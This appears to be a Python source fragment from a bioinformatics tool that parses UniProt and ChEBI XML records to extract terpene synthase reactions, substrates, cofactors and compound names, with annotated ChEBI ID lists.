# CHEBI:138807 ent-copal-8-ol diphosphate
# CHEBI:58553 ent-copalyl diphosphate
# CHEBI:57533 GGPP aka geranylgeranyl diphosphate(3โ)
# CHEBI:7525 NPP
# CHEBI:138305 pre-ฮฑ-onocerin
# CHEBI:15440 CHEBI:10843, CHEBI:9245, CHEBI:10795, CHEBI:15104, CHEBI:26746 squalene
# CHEBI:175763 (2E,6E)-FPP(3-) aka 2-trans,6-trans-farnesyl diphosphate(3โ)
# CHEBI:17407 (E,E)-FPP FPP CHEBI:12874, CHEBI:11491, CHEBI:42496, CHEBI:10700, CHEBI:11488, CHEBI:12854, CHEBI:19789 (2-trans,6-trans-farnesyl diphosphate) alias (E,E)-FPP alias (2E,6E)-FPP
# peregrinol diphosphate CHEBI:138890
# peregrinol PP alias? peregrinol diphosphate(3โ) CHEBI:138232
#
# Nevyreseno:
# (Z,Z)-FPP
# NNPP
# the cofactors are annotated outside of each chemical reaction in Uniprot, see https://www.uniprot.org/uniprot/A0A1D6LTV0.xml
# <comment type="cofactor">
# <cofactor evidence="2">
# <name>Mg(2+)</name>
# <dbReference type="ChEBI" id="CHEBI:18420"/>
# </cofactor>
# <cofactor evidence="2">
# <name>Mn(2+)</name>
# <dbReference type="ChEBI" id="CHEBI:29035"/>
# </cofactor>
# <text evidence="4">Binds 3 Mg(2+) or Mn(2+) ions per subunit.</text>
# </comment>
possible_cofactors = set(['CHEBI:18420', 'CHEBI:15377', 'CHEBI:29035', 'CHEBI:48828'])
# CHEBI:18420 Mg2+
# CHEBI:29035 Mn2+
# CHEBI:48828 Co2+
# CHEBI:15377 H2O
# CHEBI:30413 heme
# CHEBI:60344 heme b
# CHEBI:29103 K+
# CHEBI:29034 Fe(3+)
# CHEBI:49786 Ni(2+)
# CHEBI:29108 Ca(2+)
# CHEBI:58210 FMN
# CHEBI:57783 NADPH
# CHEBI:24875 Fe cation
# CHEBI:60240 a divalent metal cation
# CHEBI:49883 [4Fe-4S] cluster
# disabling intermediates altogether, they should be treated as products
# intermediates = ['CHEBI:63190', 'CHEBI:58622', 'CHEBI:49263', 'CHEBI:58553', 'CHEBI:64283', 'CHEBI:58635', 'CHEBI:30939', 'CHEBI:10760', 'CHEBI:29558']
# CHEBI:63190 (+)-ฮฒ-caryophyllene
# CHEBI:58622 9ฮฑ-copalyl diphosphate
# CHEBI:49263 (S)-ฮฒ-bisabolene
# CHEBI:58553 ent-copalyl diphosphate
# CHEBI:64283 copal-8-ol diphosphate(3โ) aka 8-hydroxycopalyl diphosphate
# CHEBI:58635 CHEBI:30939 CHEBI:10760, CHEBI:29558 (+)-copalyl diphosphate, see e.g. H8ZM70
# CHEBI:138305 (21S)-21,22-epoxypolypoda-8(26)-13,17-trien-3ฮฒ-ol aka pre-alpha-onocerin
# blacklist of IDs of reaction substrates or non-cyclic terpenes, etc., but *also* including ฮฒ-farnesene CHEBI:10418
# these IDs are not downloaded into the cache, unless they already were downloaded before addition to this list
# IDs appearing in this list also do not get output into the output list of terpenes
non_terpene_and_acyclic_terpene_chebi_ids = set(['CHEBI:35194', 'CHEBI:33019', 'CHEBI:128769', 'CHEBI:10418', 'CHEBI:10280', 'CHEBI:58756', 'CHEBI:15441', 'CHEBI:57665', 'CHEBI:15440', 'CHEBI:57907', 'CHEBI:61984', 'CHEBI:58206', 'CHEBI:15347', 'CHEBI:162247', 'CHEBI:17221', 'CHEBI:60374', 'CHEBI:98', 'CHEBI:46702', 'CHEBI:16240', 'CHEBI:35757', 'CHEBI:3407', 'CHEBI:13657', 'CHEBI:25382', 'CHEBI:43474', 'CHEBI:43470', 'CHEBI:29139', 'CHEBI:28938', 'CHEBI:83628', 'CHEBI:24646', 'CHEBI:134188', 'CHEBI:22534', 'CHEBI:49783', 'CHEBI:7435', 'CHEBI:139521', 'CHEBI:15379', 'CHEBI:44742', 'CHEBI:7860', 'CHEBI:10745', 'CHEBI:13416', 'CHEBI:23833', 'CHEBI:25366', 'CHEBI:29097', 'CHEBI:30491', 'CHEBI:139520', 'CHEBI:132124', 'CHEBI:57540', 'CHEBI:58340', 'CHEBI:128753', 'CHEBI:33384', 'CHEBI:17268', 'CHEBI:57288', 'CHEBI:33738', 'CHEBI:33737', 'CHEBI:58720', 'CHEBI:57783', 'CHEBI:57287', 'CHEBI:15378', 'CHEBI:57623', 'CHEBI:57945', 'CHEBI:58349', 'CHEBI:29452', 'CHEBI:17447', 'CHEBI:48058', 'CHEBI:35194']) - substrates - possible_cofactors
# CHEBI:35194 - isoprene
# CHEBI:33019 - diphosphate(3โ)
# CHEBI:57623 - prenyl diphosphate(3-)
# CHEBI:128769 - isopentenyl diphosphate(3โ)
# CHEBI:10280 - (E,E)-ฮฑ-farnesene
# CHEBI:16240 - hydrogen peroxide
# CHEBI:35757 - monocarboxylic acid anion
# CHEBI:3407 - monocarboxylic acid anion
# CHEBI:13657 - monocarboxylic acid anion
# CHEBI:25382 - monocarboxylic acid anion
# CHEBI:43474 - hydrogenphosphate
# CHEBI:43470 - hydrogenphosphate
# CHEBI:29139 - hydrogenphosphate
# CHEBI:28938 - ammonium
# CHEBI:83628 - N-acylammonia
# CHEBI:24646 - hydroquinones
# CHEBI:134188 - hydroquinones
# CHEBI:22534 - ammonium
# CHEBI:49783 - ammonium
# CHEBI:7435 - ammonium
# CHEBI:139521 - phenolic radical donor
# CHEBI:15379 - dioxygen
# CHEBI:44742 - dioxygen
# CHEBI:7860 - dioxygen
# CHEBI:10745 - dioxygen
# CHEBI:13416 - dioxygen
# CHEBI:23833 - dioxygen
# CHEBI:25366 - dioxygen
# CHEBI:29097 - dioxygen
# CHEBI:30491 - dioxygen
# CHEBI:139520 - phenolic donor
# CHEBI:132124 - 1,4-benzoquinones
# CHEBI:57540 - NAD(1-)
# CHEBI:58340 - O-acetyl-L-serine zwitterion
# CHEBI:128753 - (2E)-4-hydroxy-3-methylbut-2-enyl diphosphate(3-)
# CHEBI:33384 - L-serine zwitterion
# CHEBI:17268 - myo-inositol
# CHEBI:57288 - acetyl-CoA(4-)
# CHEBI:57287 - coenzyme A(4-)
# CHEBI:33738 - di-mu-sulfido-diiron(1+)
# CHEBI:33737 - di-mu-sulfido-diiron(2+)
# CHEBI:58720 - D-glucopyranuronate
# CHEBI:57783 - NADPH(4-)
# CHEBI:15378 - hydron
# CHEBI:57945 - NADH(2-)
# CHEBI:58349 - NADP(3-)
# CHEBI:48058 - buten-2-one
# CHEBI:17221 - ฮฒ-myrcene (acyclic monoterpene), see e.g. Q5SBP1
# CHEBI:98 - (S)-linalool
# CHEBI:29452 - nerol
# CHEBI:17447 - geraniol
# CHEBI:35194 - isoprene
def parse_list_or_set_line(line):
_strlist = line.split(':')[1][1:-1]
return filter(lambda x: x != 'None' and x is not None, parse_list_or_set(_strlist))
def parse_list_or_set(_strlist):
if _strlist == 'None':
_out = []
elif _strlist == 'set()':
_out = []
elif _strlist == '[]':
_out = []
elif _strlist and _strlist[0] == '[':
if "," in _strlist:
_out = _strlist[1:-1].split(', ')
if _out[0][0] == "'":
_out = map(lambda y: y[1:-1], _out)
elif _strlist[:2] == "['" or _strlist[:2] == '["':
_out = [_strlist[2:-2]]
elif _strlist == '[None]':
_out = [None]
else:
_out = [_strlist[2:-2]]
elif _strlist and _strlist[0] == 'set(': # set(['aa', 'a', 'c', 'd', 'bb'])
_out = map(lambda x: x[1:-1], _strlist[5:-2].split(', '))
else:
_out = _strlist
# convert to integers if possible
if isinstance(_out, list):
_new = []
for _item in _out:
try:
_new.append(int(_item))
except:
_new.append(_item)
return _new
else:
return _out
def parse_known_terpenes(filename="terpene_names.uniq.txt"):
"""Multi-line strings are wrapped by double-quotes. Such entries appear in the XLSX files
mostly by mistake but line-based approach yields entries starting with double-quote sign.
This is unused code at the moment.
"""
_known_terpenes = []
print("Info: Opening %s with known terpenes" % filename)
with open(filename) as _file:
for _line in _file:
if _line[0] != '#':
if _line[0] != '"':
_known_terpenes.append(_line[:-1].strip())
else:
_known_terpenes.append(_line[1:-1].strip())
if myoptions.debug: print("Debug: _known_terpenes=%s" % str(_known_terpenes))
return _known_terpenes
def parse_chebi_xml(filename):
"""Keeps data in lists so we can capture multiple values eventually, do not know
what to expect at the moment.
ChEBI keeps substance names in two places, <NAME> and <SYNONYM> tags.
"""
_chebi_id = None
_definition = []
_names = [] # do not use list to keep ordering, the first name is teh official IUPAC name, then synonyms are appended
_formula = None
_smiles = None
try:
# https://github.com/ebi-chebi/ChEBI/issues/4182
etree=ET.parse(filename)
except:
try:
os.rename(filename, filename + ".bad")
except FileNotFoundError as e:
sys.stderr.write("Error: Failed to rename a file %s: %s\n" % (str(filename), str(e.with_traceback)))
return(_chebi_id, _names, _definition, _formula, _smiles)
root=etree.getroot()
for elem in root:
if myoptions.debug: print("Level 0: ", elem.tag, ' ', elem.attrib, ' ', elem.text)
for child in elem:
if myoptions.debug > 1: print("Items: ", str(child.items()))
if myoptions.debug: print("Level 1: tag:", child.tag, 'attrib:', child.attrib, 'text:', child.text)
if child.tag == 'ID':
if myoptions.debug: print("L1: child.attrib: ", child.attrib, "child.tag: ", child.tag)
if not _chebi_id:
_chebi_id = child.text
else:
raise ValueError("Does ChEBI have multiple IDs for %s ?" % str(child.text))
if child.tag == 'NAME':
# ['casbene', 'casbene', 'Casbene']
# ['terpinolene', 'Terpinolene', 'terpinolene', 'Terpinolen', 'isoterpinene', 'alpha-terpinolene', '4-isopropylidene-1-methylcyclohexene', '1-methyl-4-(1-methylethylidene)cyclohexene', '1-methyl-4-(1-methylethylidene)-1-cyclohexene', '1,4(8)-p-menthadiene']
# ['epi-cedrol', 'epi-cedrol', '8-epicedrol', '8-epicedrol', '8-epi-cedrol', '(3R,3aS,6S,7R,8aS)-3,6,8,8-tetramethyloctahydro-1H-3a,7-methanoazulen-6-ol', '(-)-epicedrol']
# ['viridiflorene', 'viridiflorene', 'Ledene', 'Leden']
# ['dammarenediol-ii', 'dammarenediol-ii', 'dammarenediol ii', 'dammarenediol', 'dammar-24-ene-3beta,20-diol', 'dammar-24-ene-20(ss),3beta-diol', '8-methyl-18-nor-lanost-24-ene-3beta,20-diol', '8-methyl-18-nor-lanost-24-en-3beta,20-diol', '3beta-glucodammar-24-ene-3,20-diol', '(20s)-dammarenediol', '(20s)-dammar-24-ene-3beta,20-diol']
# ['beta-phellandren', 'beta-phellandrene', '3-isopropyl-6-methylene-1-cyclohexene', '2-p-menthadiene', '3-methylene-6-(1-methylethyl)cyclohexene', '4-isopropyl-1-methylene-2-cyclohexene']
# ['ophiobolin F', 'ophiobolene']
# ['(+)-vkiteagnusin d', 'viteagnusin d'] # typo in ChEBI
if child.text not in _names:
_names.extend([child.text])
if child.tag == 'DEFINITION':
if not _definition:
_definition = [child.text]
else:
_definition += [child.text]
if child.tag == 'FORMULA':
if not _formula:
_formula = [child.text] # TODO: to keep in sync with other values wrap this unnecessarily with a list, which is inefficient, downstream code in recursive_translator() splits them into single letters mistakenly
if child.tag == 'SYNONYM':
if child.text not in _names:
# remove duplicates because the SYNONYMS listing re-includes the official IUPAC name
# https://www.ebi.ac.uk/chebi/searchId.do?chebiId=CHEBI:15415
_names.extend([child.text])
if child.tag == 'SMILES':
if not _smiles:
_smiles = [child.text] # TODO: to keep in sync with other values wrap this unnecessarily with a list, which is inefficient, downstream code in recursive_translator() splits them into single letters mistakenly
#if child.tag == 'INCHI':
# if not _inchi:
# _inchi = child.text
if myoptions.debug: print("Info: IDs: %s, names: %s, definition: %s, formula: %s, smiles: %s" % (str(_chebi_id), str(_names), str(_definition), str(_formula), str(_smiles)))
return(_chebi_id, _names, _definition, _formula, _smiles)
def check_parsed_list_lengths(_primary_accession, _chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids, _cofactors):
"""The Uniprot annotation is inconsistent. Some entries have annotated reactions,
have assigned ChEBI IDs to each reactant, have RHEA IDs assigned and there is
one EC number per reaction annotated.
But, some entries despite having most of the stuff annotated have no EC number
annotated (most commonly), less commonly lack some ChEBI IDs or RHEA IDs.
Also it seems the reaction is in ideal cases recorded like
'(2E,6E)-farnesyl diphosphate = (1E,4E)-germacrene B + diphosphate'
but in some cases it is just a free text describing in words what is deemed to be
ongoing.
"""
_min = min([len(x) for x in [_chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids, _cofactors]])
_max = max([len(x) for x in [_chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids, _cofactors]])
_listnames = ['_chebi_ids', '_rhea_ids', '_ec_numbers', '_reactions', '_cofactor_ids', '_cofactors']
if _min != _max:
for _list, _listname in zip([_chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids, _cofactors], _listnames):
if len(_list) < _max:
sys.stderr.write("Error: %s: Names are %s, their lengths are %s\n" % (str(_primary_accession), str(_listnames), str([len(x) for x in [_chebi_ids, _rhea_ids, _ec_numbers, _reactions]])))
if _listname == '_chebi_ids':
sys.stderr.write("Error: %s: Missing some ChEBI ID in %s=%s is shorter than others: %s.\n" % (str(_primary_accession), _listname, str(_list), str([_chebi_ids, _rhea_ids, _ec_numbers, _reactions])))
elif _listname == '_rhea_ids':
sys.stderr.write("Error: %s: Missing some RHEA ID in %s=%s is shorter than others: %s.\n" % (str(_primary_accession), _listname, str(_list), str([_chebi_ids, _rhea_ids, _ec_numbers, _reactions])))
elif _listname == '_ec_numbers':
sys.stderr.write("Error: %s: Missing some EC number in %s=%s is shorter than others: %s.\n" % (str(_primary_accession), _listname, str(_list), str([_chebi_ids, _rhea_ids, _ec_numbers, _reactions])))
elif _listname == '_reactions':
sys.stderr.write("Error: %s: Missing some reaction description in %s=%s is shorter than others: %s.\n" % (str(_primary_accession), _listname, str(_list), str([_chebi_ids, _rhea_ids, _ec_numbers, _reactions])))
raise
def process_delayed_buffers(_primary_accession, _chebi_ids_local, _rhea_ids_local, _ec_numbers_local, _reactions_local, _cofactor_ids_local, _cofactors_local, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry):
# when hitting a second '<comment type="catalytic activity">' entry or end of file or a new Uniprot entry item, process the previously collected data
if myoptions.debug:
print("Debug: process_delayed_buffers(): %s: Received _chebi_ids_local=%s, _rhea_ids_local=%s, _ec_numbers_local=%s, _reactions_local=%s" % (str(_primary_accession), str(_chebi_ids_local), str(_rhea_ids_local), str(_ec_numbers_local), str(_reactions_local)))
print("Debug: process_delayed_buffers(): %s: Entered with _chebi_ids_per_entry=%s, _rhea_ids_per_entry=%s, _ec_numbers_per_entry=%s, _reactions_per_entry=%s" % (str(_primary_accession), str(_chebi_ids_per_entry), str(_rhea_ids_per_entry), str(_ec_numbers_per_entry), str(_reactions_per_entry)))
if _chebi_ids_local or _rhea_ids_local or _ec_numbers_local or _reactions_local:
if _chebi_ids_local:
_chebi_ids_per_entry.append(copy.deepcopy(_chebi_ids_local))
else:
_chebi_ids_per_entry.append([])
if _rhea_ids_local:
_rhea_ids_per_entry.append(copy.deepcopy(_rhea_ids_local))
else:
_rhea_ids_per_entry.append([])
if _ec_numbers_local:
_ec_numbers_per_entry.append(copy.deepcopy(_ec_numbers_local))
else:
_ec_numbers_per_entry.append([])
if _reactions_local:
_reactions_per_entry.append(copy.deepcopy(_reactions_local))
else:
_reactions_per_entry.append([])
if _cofactor_ids_local:
_cofactor_ids_per_entry.append(copy.deepcopy(_cofactor_ids_local))
else:
_cofactor_ids_per_entry.append([])
if _cofactors_local:
_cofactors_per_entry.append(copy.deepcopy(_cofactors_local))
else:
_cofactors_per_entry.append([])
if myoptions.debug:
print("Debug: process_delayed_buffers(): %s: Re-wrapped data into lists to keep their lengths same: _chebi_ids_per_entry=%s, _rhea_ids_per_entry=%s, _ec_numbers_per_entry=%s, _reactions_per_entry=%s, _cofactor_ids_per_entry=%s, _cofactors_per_entry=%s" % (str(_primary_accession), str(_chebi_ids_per_entry), str(_rhea_ids_per_entry), str(_ec_numbers_per_entry), str(_reactions_per_entry), str(_cofactor_ids_per_entry), str(_cofactors_per_entry)))
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
if myoptions.debug:
print("Debug: process_delayed_buffers(): %s: Leaving with _chebi_ids_per_entry=%s, _rhea_ids_per_entry=%s, _ec_numbers_per_entry=%s, _reactions_per_entry=%s, _cofactor_ids_per_entry=%s, _cofactors_per_entry=%s" % (str(_primary_accession), str(_chebi_ids_per_entry), str(_rhea_ids_per_entry), str(_ec_numbers_per_entry), str(_reactions_per_entry), str(_cofactor_ids_per_entry), str(_cofactors_per_entry)))
def parse_uniprot_xml(filename, uniprot_pri_acc2aliases, uniprot_aliases2pri_acc, already_parsed):
"""Parse a single XML stream (a file pre-fetched into a local cache) from Uniprot.
<?xml version="1.0" encoding="UTF-8"?>
<uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/support/docs/uniprot.xsd">
<entry created="2018-11-07" dataset="Swiss-Prot" modified="2019-12-11" version="30">
<accession>G0LES5</accession>
<name>TRI5_TRIAR</name>
...
</entry>
<copyright>
Copyrighted by the UniProt Consortium, see https://www.uniprot.org/terms
Distributed under the Creative Commons Attribution (CC BY 4.0) License
</copyright>
</uniprot>
"""
# A0A348B779 - data for the last reaction were not parsed out, so the product CHEBI:140564 got lost
# A0A5Q0QRJ3
# Q50L36
if not os.path.exists(filename):
raise ValueError("File %s does not exist." % str(filename))
else:
if filename.endswith('xml.gz'):
_file = gzip.open(filename)
else:
_file = open(filename)
print("Info: Opened %s for parsing" % filename)
etree = ET.iterparse(_file, events=('start', 'end'))
# try:
# etree=ET.parse(filename)
# except ET.ParseError:
# raise ET.ParseError("Maybe the file %s is not in XML format?" % str(filename))
# root=etree.getroot() # AttributeError: 'IterParseIterator' object has no attribute 'getroot'
_primary_accession = None
_secondary_accessions = []
_uniprot_name = None
_recommended_name = None # sometimes UniProt has unset protein_names and also feature_description
_alternative_names = []
_submitted_name = None
_feature_descriptions = []
_sequence = None
_organism = None
_lineage = []
# data buffers to be processed in a delayed way
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
_item_counter = 0
# for elem in root:
for event, elem in etree:
if myoptions.debug:
print("Debug: event=%s, elem=%s" % (str(event), str(elem)))
print("Level 0: ", event, elem.tag, ' ', elem.attrib, ' ', elem.text)
if elem.tag == '{http://uniprot.org/uniprot}entry':
if event == 'start' and _primary_accession and _primary_accession not in already_parsed:
if myoptions.debug > 1: print("Debug: %s: Reached start tag of a new entry section: %s in %s, returning results parsed so far for %s" % (_primary_accession, filename, str(elem.items()), str(_primary_accession)))
# process previously parsed data buffers
process_delayed_buffers(_primary_accession, _chebi_ids_local, _rhea_ids_local, _ec_numbers_local, _reactions_local, _cofactor_ids_local, _cofactors_local, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
if myoptions.verbose or myoptions.debug:
print("Info: %s: Yielding a single entry %d from file %s" % (_primary_accession, _item_counter, str(filename)))
for _var, _varname in zip([_primary_accession, _secondary_accessions, _uniprot_name, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _sequence, _organism, _lineage], ['_primary_accession', '_secondary_accessions', '_uniprot_name', '_recommended_name', '_alternative_names', '_submitted_name', '_feature_descriptions', '_chebi_ids_per_entry', '_rhea_ids_per_entry', '_ec_numbers_per_entry', '_reactions_per_entry', '_cofactor_ids_per_entry', '_cofactors_per_entry', '_sequence', '_organism', '_lineage']):
print("Info: %s: %s=%s" % (_primary_accession, _varname, _var))
if not _recommended_name and not _alternative_names and not _submitted_name:
# <uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/support/docs/uniprot.xsd">
# <entry created="2011-10-19" dataset="TrEMBL" modified="2021-04-07" version="68">
# <accession>G1JUH4</accession>
# <name>G1JUH4_SOLLC</name>
# <protein>
# <submittedName>
# <fullName evidence="4 5">Beta myrcene/limonene synthase</fullName>
# </submittedName>
raise ValueError("No protein descriptions were parsed for _primary_accession=%s, _secondary_accessions=%s from %s" % (str(_primary_accession), str(_secondary_accessions), filename))
check_parsed_list_lengths(_primary_accession, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
yield(_primary_accession, _secondary_accessions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence)
# clear the values after pushing them out as results
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
_chebi_ids_per_entry = []
_rhea_ids_per_entry = []
_ec_numbers_per_entry = []
_reactions_per_entry = []
_cofactor_ids_per_entry = []
_cofactors_per_entry = []
_primary_accession = None
_secondary_accessions = []
_uniprot_name = None
_recommended_name = None # sometimes UniProt has unset protein_names and also feature_description
_alternative_names = []
_submitted_name = None
_feature_descriptions = []
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
_chebi_ids_per_entry = []
_rhea_ids_per_entry = []
_ec_numbers_per_entry = []
_reactions_per_entry = []
_cofactor_ids_per_entry = []
_cofactors_per_entry = []
_sequence = None
_organism = None
_lineage = []
elif event == 'end' and elem.tag == '{http://uniprot.org/uniprot}copyright' and _primary_accession and _primary_accession and _primary_accession not in already_parsed:
# process previously parsed data buffers
process_delayed_buffers(_primary_accession, _chebi_ids_local, _rhea_ids_local, _ec_numbers_local, _reactions_local, _cofactor_ids_local, _cofactors_local, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
if myoptions.debug > 1: print("Debug: %s: Reached items %s in %s, returning results parsed so far" % (_primary_accession, str(elem.items()), filename))
if not _recommended_name and not _alternative_names and not _submitted_name:
# <uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/support/docs/uniprot.xsd">
# <entry created="2011-10-19" dataset="TrEMBL" modified="2021-04-07" version="68">
# <accession>G1JUH4</accession>
# <name>G1JUH4_SOLLC</name>
# <protein>
# <submittedName>
# <fullName evidence="4 5">Beta myrcene/limonene synthase</fullName>
# </submittedName>
raise ValueError("No proteins descriptions were parsed for _accessions=%s, _secondary_accessions=%s" % (str(_primary_accession), str(_secondary_accessions)))
else:
if myoptions.debug: print("Info: Yielding the very last entry %s from file %s" % (str(_primary_accession), str(filename)))
if myoptions.debug:
for _var, _varname in zip([_primary_accession, _secondary_accessions, _uniprot_name, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _sequence, _organism, _lineage], ['_primary_accession', '_secondary_accessions', '_uniprot_name', '_recommended_name', '_alternative_names', '_submitted_name', '_feature_descriptions', '_chebi_ids_per_entry', '_rhea_ids_per_entry', '_ec_numbers_per_entry', '_reactions_per_entry', '_cofactor_ids_per_entry', '_cofactors_per_entry', '_sequence', '_organism', '_lineage']):
print("Info: %s: %s=%s" % (_primary_accession, _varname, _var))
check_parsed_list_lengths(_primary_accession, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
yield(_primary_accession, _secondary_accessions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence)
# clear the values after pushing them out as results
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
_chebi_ids_per_entry = []
_rhea_ids_per_entry = []
_ec_numbers_per_entry = []
_reactions_per_entry = []
_cofactor_ids_per_entry = []
_cofactors_per_entry = []
for child in elem:
if myoptions.debug > 1: print("Child items: ", str(child.items()))
if myoptions.debug > 1: print("Level 1:", event, 'tag:', child.tag, 'attrib:', child.attrib, 'text:', child.text)
if event == 'end' and child.tag == '{http://uniprot.org/uniprot}accession' and child.text and child.text not in already_parsed: # do not parse duplicate entries again, e.g. E9E766
if myoptions.debug > 1: print("Info: Came across accession %s" % child.text)
if myoptions.debug > 1: print("L1: child.attrib: ", child.attrib, "child.tag: ", child.tag)
if not _primary_accession:
_primary_accession = child.text # "Q6XDB5"
else:
_secondary_accessions.append(child.text) # "C0PT91"
uniprot_aliases2pri_acc[child.text] = _primary_accession # point to the primary
if _primary_accession not in uniprot_pri_acc2aliases.keys():
uniprot_pri_acc2aliases[_primary_accession] = [child.text]
else:
uniprot_pri_acc2aliases[_primary_accession].extend([child.text])
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}name':
_uniprot_name = child.text # "TPSD2_PICSI"
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}sequence':
_sequence = child.text
if event == 'end' and child.tag == '{http://uniprot.org/uniprot}feature':
if 'type' in child.attrib.keys() and 'description' in child.attrib.keys() and child.attrib['type'] == 'chain':
_feature_descriptions.extend([child.attrib['description']]) # A0A2N8PG38, A0A239C551
if _primary_accession:
for subchild in child:
if myoptions.debug > 1: print("Level 2: ", event, subchild.tag, ' ', subchild.attrib, ' ', subchild.text)
if event == 'end' and child.tag == '{http://uniprot.org/uniprot}organism':
if subchild.tag == '{http://uniprot.org/uniprot}name' and subchild.attrib['type'] == 'scientific':
_organism = subchild.text
for sschild in subchild:
tag = {}
if myoptions.debug > 1: print("Level 3: ", event, sschild.tag, ' ', sschild.attrib, ' ', sschild.text)
if event == 'end' and subchild.tag == '{http://uniprot.org/uniprot}recommendedName':
if sschild.tag == '{http://uniprot.org/uniprot}fullName':
_recommended_name = sschild.text
elif event == 'end' and subchild.tag == '{http://uniprot.org/uniprot}alternativeName':
if sschild.tag == '{http://uniprot.org/uniprot}fullName':
if not _alternative_names:
_alternative_names = [sschild.text]
else:
_alternative_names.extend([sschild.text]) # A0A2N0DJE2
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}protein':
if subchild.tag == '{http://uniprot.org/uniprot}submittedName':
if sschild.tag == '{http://uniprot.org/uniprot}fullName':
_submitted_name = sschild.text # G1JUH4
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}comment' and 'type' in child.attrib.keys() and child.attrib['type'] == 'catalytic activity' and subchild.tag == '{http://uniprot.org/uniprot}reaction':
# https://www.uniprot.org/uniprot/A0A348B779.xml
# <comment type="catalytic activity">
# <reaction evidence="3">
# <text>
# (2E,6E)-farnesyl diphosphate = diphosphate + gamma-muurolene
# </text>
# <dbReference type="Rhea" id="RHEA:33107"/>
# <dbReference type="ChEBI" id="CHEBI:33019"/>
# <dbReference type="ChEBI" id="CHEBI:64798"/>
# <dbReference type="ChEBI" id="CHEBI:175763"/>
# <dbReference type="EC" id="4.2.3.126"/>
# </reaction>
# <physiologicalReaction direction="left-to-right" evidence="3">
# <dbReference type="Rhea" id="RHEA:33108"/>
# </physiologicalReaction>
# </comment>
if event == 'end' and sschild.tag == '{http://uniprot.org/uniprot}dbReference':
if sschild.attrib['type'] == 'ChEBI':
# do not even fetch unwanted ChEBI Ids
# if sschild.attrib['id'] not in non_terpene_and_acyclic_terpene_chebi_ids:
if sschild.attrib['id'] not in _chebi_ids_local:
_chebi_ids_local.append(sschild.attrib['id'])
elif sschild.attrib['type'] == 'Rhea':
# Reaction direction could be undefined, left-to-right, right-to-left, bidirectional
# So probably 4 Rhea IDs exist per every EC number (reaction)
_rhea_ids_local.append(sschild.attrib['id'])
elif sschild.attrib['type'] == 'EC':
# seems only a single EC number exists per reaction
_ec_numbers_local.append(sschild.attrib['id'])
elif event == 'end' and sschild.tag == '{http://uniprot.org/uniprot}text':
_reactions_local.append(sschild.text)
else:
raise ValueError("Unexpected tag in Uniprot XML stream sschild.tag=%s" % str(sschild.tag))
# when leaving "</reaction>" check if we lengths of lists are same if not, fill the missing ones
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}comment' and 'type' in child.attrib.keys() and child.attrib['type'] == 'cofactor' and subchild.tag == '{http://uniprot.org/uniprot}cofactor':
# A3KI17
if event == 'end' and sschild.tag == '{http://uniprot.org/uniprot}dbReference':
if sschild.attrib['type'] == 'ChEBI':
_cofactor_ids_local.append(sschild.attrib['id'])
if event == 'end' and sschild.tag == '{http://uniprot.org/uniprot}name':
_cofactors_local.append(sschild.text)
# Level 1: {http://uniprot.org/uniprot}comment {'type': 'catalytic activity'}
# Level 2: {http://uniprot.org/uniprot}reaction {'evidence': '3'}
# Level 3: {http://uniprot.org/uniprot}text {} (2E)-geranyl diphosphate = (1S,5S)-alpha-pinene + diphosphate
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': 'RHEA:25488', 'type': 'Rhea'} None
